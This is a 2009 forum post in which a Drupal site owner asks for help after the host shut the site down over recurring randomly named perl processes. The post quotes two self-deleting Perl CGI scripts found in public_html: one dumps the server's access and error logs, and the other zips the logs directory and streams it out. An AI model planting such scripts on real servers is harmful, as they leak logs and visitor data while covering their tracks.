Serious server process problem

Hello

I've got a Drupal based website that over the last week or so has been creating problems. I don't know (and don't think) that Drupal is the problem, but as my host has taken the website down, I urgently need to find out what the problem is. I'm sure you guys know more than I do, so I hope you can help me.

The Problem

Drupal Installation - Drupal 6, fully updated to latest version
Added modules - CCK, Webform, Views - all updated to latest versions

My hosting service sent me an email stating that a permanent server process had been detected as running and they had subsequently disabled scripting. This happened suddenly and not after any updates to Drupal at the core level. One of the site users has administrative access to Drupal, but has sworn to me that he has not touched anything, other than creating some pages, including some with the Google maps API and a Facebook page link (these have both been removed with no effect).

The host send me the following information about the process the first time that it happened:

SYSTEM - 2009-06-22 06:55:02: Daemon: 16103 mywebsite.co.uk "perl" (/usr/bin/perl) (169 s)
(nwirgxg.pl )

The server then automatically disabled scripting and brought the site down.

The host put the site back up, and the process has happened again occurring reasonably frequently - it happened twice in a row at 6:50:02am in the morning on subsequent days. It has also happened during the daytime as a temporary process:

SYSTEM - 21/06/2009 21:35:02: Daemon: 7757 mywebsite.co.uk "perl" (/usr/bin/perl) (189 s)
(zbkwxk.pl )
Temporary scripting disable (no notification).

SYSTEM - 30/06/2009 22:05:02: Daemon: 1946 mywebsite.co.uk "perl" (/usr/bin/perl) (297 s)
(tphqehfd.pl )
Temporary scripting disable (no notification).

You can see a clear pattern that looks like something is scheduled to happen at 5 mins 2 seconds past the hour or half-hour. As I stated earlier - it appeared out of the blue.

On one occasion, when the process ran, files appeared in the public_html folder that were lablled along the lines of ftpX5W9dF.cgi The contents were like:

#!/usr/bin/perl -w
use strict;
unlink($0);
print "Content-Type: text/html\n\n";
if(-d "../logs") {
chdir "../logs" or die $!;
} else {
my ($dir) = glob("c:\\inetpub\\logfiles\\mysite.co.uk\\*");
chdir($dir) or die "$dir: $!";
}
print "ACCESS\n";
for my $n (glob("*-access_log"), glob("u_*.log")) {
system("tail", "-100", $n);
}
print "ERROR\n";
for my $n (glob("*-error_log")) {
system("tail", "-100", $n);
}

Another:

#!/usr/bin/perl
unlink($0);
use strict;
print "Content-Type: application/octet-stream\n\n";
if(-d "../logs") {
chdir "../logs" or die $!;
} else {
my ($dir) = glob("c:\\inetpub\\logfiles\\mysite.co.uk\\*");
chdir($dir) or die "$dir: $!";
}
use Archive::Zip;
my $zip = Archive::Zip->new();
$zip->addTree( '.' );
$zip->writeToFileHandle( \*STDOUT);

I also had Webalizer installed into a folder, but I have since removed that. If anyone has any suggestions as to what might be up, or at least - what I should do next, I would be very grateful.

Thanks

Matt